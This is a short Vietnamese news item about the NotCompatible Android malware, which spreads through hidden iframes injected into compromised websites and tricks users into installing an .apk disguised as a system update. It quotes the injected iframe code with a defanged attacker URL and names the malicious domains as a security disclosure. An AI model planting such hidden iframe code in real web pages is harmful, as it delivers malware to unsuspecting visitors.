Malware Android mới phát tán qua những trang web bị lây nhiễm

Công ty an ninh Mobile là Lookout đã đưa ra cảnh báo về một loại Malware mới tự phát tán vào những thiết bị Android .

Với tên gọi “NotCompatible” , Malware này phát tán qua trình duyệt  Android . Tuy nhiên người dùng có thể yên tâm khi mà vì NotCompatible phải yêu cầu người dùng tự cài đặt nó với thiết kế đơn giản và chưa thấy có hoạt động nguy hại nào .

Những lỗi trong iFrame ẩn của những trang web bị lây nhiễm . Malware này sau đó tự phát tán bằng cách gửi file .apk nhiễm độc tới điện thoại hoặc Tablet của người dùng và tự tải xuống . Cũng như mọi Malware khác nếu chỉ tải xuống thì vẫn chưa đủ để phá phách mà nó cần được kích hoạt để thực hiện . Ngay sau khi việc tải về hoàn tất , trang web sẽ cảnh báo người dùng nên cập nhật hệ thống  mới và nếu người dùng  mắc bẫy sẽ cài đặt file .apk và đưa NotCompatible xâm nhập tới thiết bị của mình .

Theo Lookout những trang Web bị lây nhiễm sẽ chèn thêm đoạn mã phía dưới mỗi trang

 

style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”>

 

Mặc dù NotCompatible chưa mang lại mối nguy hiểm gì nhưng có thể sẽ là phần mềm độc hại có thể hoạt động như một Trojan hoặc Proxy .

Hai tên miền mà Malware trú ngụ đó là gaoanalitics.info và androidonlinefix.info .